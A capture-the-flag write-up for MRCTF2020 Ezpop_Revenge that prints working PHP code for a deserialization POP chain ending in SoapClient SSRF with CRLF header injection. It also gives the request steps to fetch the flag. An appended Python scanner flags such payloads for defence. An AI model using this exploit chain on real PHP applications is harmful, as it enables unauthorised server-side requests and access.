[MRCTF2020]Ezpop_Revenge
Deserialization POP chain:

HelloWorld_DB::__wakeup -> Typecho_Db::__construct (__toString) -> Typecho_Db_Query::__construct -> ($this->_adapter = new SoapClient) -> SSRF
payload:

```php
<?php
// Generates the serialized HelloWorld_DB object whose __wakeup walks the chain above
// and ends in a SoapClient request to the internal flag page (SSRF).
class Typecho_Db_Query {
    private $_sqlPreBuild;
    private $_adapter;

    public function __construct() {
        $target  = 'http://127.0.0.1/flag.php';
        // Extra request headers; the '^^' marker is swapped for CRLF after serialization
        $headers = array(
            'X-Forwarded-For: 127.0.0.1',
            'Cookie: PHPSESSID=rd6u7agm56jsrqqrrni0f6s1r6'
        );
        $b = new SoapClient(null, array(
            'location'   => $target,
            'user_agent' => 'HyyMbb^^' . join('^^', $headers),
            'uri'        => "aaab"
        ));
        $this->_sqlPreBuild = array("action" => "SELECT");
        $this->_adapter     = $b;
    }
}

class HelloWorld_DB {
    private $coincidence;

    public function __construct() {
        $this->coincidence = ["hello" => new Typecho_Db_Query()];
    }
}

$a   = new HelloWorld_DB();
$aaa = serialize($a);
$aaa = str_replace('^^', "\r\n", $aaa);   // turn the markers into real CRLF sequences
$aaa = str_replace('&', '&', $aaa);       // no-op as printed on the page
echo base64_encode($aaa);
```
First obtain the session id from flag.php, then send the output above directly as the value of the C0incid3nc3 parameter in a POST request. Then add an admin parameter to the GET query string and the flag value appears.

Reference links:
https://www.cnblogs.com/CAPD/p/17835715.html
https://cn-sec.com/archives/1113428.html
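As an added example (not part of the writeup), a defender-side check that scans the base64-encoded serialized blob for the two things this chain depends on: a `SoapClient` object and CRLF sequences inside string values. The tiny PHP serializer and the sample payload are constructed here to mirror the nesting above; the session id in it is a placeholder.

```python
import base64
import re

DANGEROUS = {"SoapClient"}             # classes whose magic methods reach the network
TOKEN = re.compile(rb'(O|s):(\d+):"')  # O:len:"Class" (object) and s:len:"bytes" (string)

def scan(data: bytes):
    """Return (class_names, string_values) from a PHP-serialized blob. String bodies
    are skipped by their length prefix, so an 'O:' inside a string cannot spoof a class."""
    classes, strings, pos = [], [], 0
    while (m := TOKEN.search(data, pos)):
        length, start = int(m.group(2)), m.end()
        chunk = data[start:start + length]
        (classes if m.group(1) == b"O" else strings).append(chunk)
        pos = start + length + 1           # step past the closing quote
    return classes, strings

def audit(b64_payload: str) -> dict:
    """Decode the base64 the writeup POSTs and report what a WAF/IDS rule would flag."""
    classes, strings = scan(base64.b64decode(b64_payload))
    names = [c.decode(errors="replace") for c in classes]
    return {"classes": names,
            "dangerous": sorted(DANGEROUS & set(names)),
            "crlf_strings": [s for s in strings if b"\r\n" in s]}  # header injection

def php_str(b: bytes) -> bytes:            # tiny serializer, only for the sample
    return b's:%d:"%s";' % (len(b), b)

def php_arr(items: dict) -> bytes:
    return b"a:%d:{%s}" % (len(items), b"".join(php_str(k) + v for k, v in items.items()))

def php_obj(cls: str, props: dict) -> bytes:
    body = b"".join(php_str(k) + v for k, v in props.items())
    return b'O:%d:"%s":%d:{%s}' % (len(cls), cls.encode(), len(props), body)

def build_sample_payload() -> str:
    """Constructed stand-in with the writeup's nesting (private props serialize as
    \\0Class\\0name); the session id is a placeholder, not a captured value."""
    soap = php_obj("SoapClient", {
        b"location": php_str(b"http://127.0.0.1/flag.php"),
        b"_user_agent": php_str(b"HyyMbb\r\nX-Forwarded-For: 127.0.0.1\r\nCookie: PHPSESSID=PLACEHOLDER"),
    })
    query = php_obj("Typecho_Db_Query", {
        b"\0Typecho_Db_Query\0_sqlPreBuild": php_arr({b"action": php_str(b"SELECT")}),
        b"\0Typecho_Db_Query\0_adapter": soap,
    })
    db = php_obj("HelloWorld_DB", {b"\0HelloWorld_DB\0coincidence": php_arr({b"hello": query})})
    return base64.b64encode(db).decode()
```

The scan only spots the pattern; the actual fix on the PHP side is `unserialize($data, ['allowed_classes' => false])` or not unserializing user input at all.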
Author:
odiws
Permalink:
http://odiws.github.io/2024/12/04/MRCTF2020-Ezpop-Revenge/
License:
Copyright (c) 2019 CC-BY-NC-4.0 LICENSE